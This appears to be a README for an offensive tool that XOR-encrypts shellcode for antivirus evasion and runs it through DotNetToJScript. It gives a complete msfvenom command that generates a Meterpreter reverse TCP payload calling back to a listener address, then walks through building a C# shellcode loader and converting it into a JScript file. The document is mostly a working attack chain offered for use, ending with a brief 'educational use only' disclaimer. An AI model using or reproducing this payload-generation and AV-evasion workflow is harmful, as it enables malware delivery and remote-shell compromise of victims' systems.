This project provides a method for executing encrypted shellcode using a combination of XOR encryption and the DotNetToJScript tool. It's designed for users who need to execute shellcode within a .NET environment.
- XOR encryption of shellcode for AV static evasion.
- Integration with DotNetToJScript for seamless execution in a .NET context.
- Python 3 (for xor.py script)
- DotNetToJScript - https://github.com/tyranid/DotNetToJScript
-
Generate your encrypted shellcode. The following example uses
msfvenomand the provided Python script:msfvenom -p windows/x64/meterpreter_reverse_tcp lhost=192.168.1.1 lport=1336 -f raw 2>/dev/null | python3 xor.py -t go -x 31 > meterpreter.txtNote:
31is used as the encryption/decryption key - change this as you see fit.
-
Import the
C#Shellcode Loaderinto the DotNetToJScript solution, replacingTestClass.cs. -
Build the solution in release mode.
-
Copy
DotNetToJscript.exeandNDesk.Options.dllto your designated folder. -
Navigate to the
ExampleAssemblyfolder and copyExampleAssembly.dll. Ensure these DLL files are in the same directory asDotNetToJScript.exe. -
Create the .js file using DotNetToJScript:
DotNetToJScript.exe ExampleAssembly.dll --lang=Jscript --ver=v4 -o demo.js
This tool is intended for educational and legal usage only. The author is not responsible for misuse or for any damage that may be caused by the tool.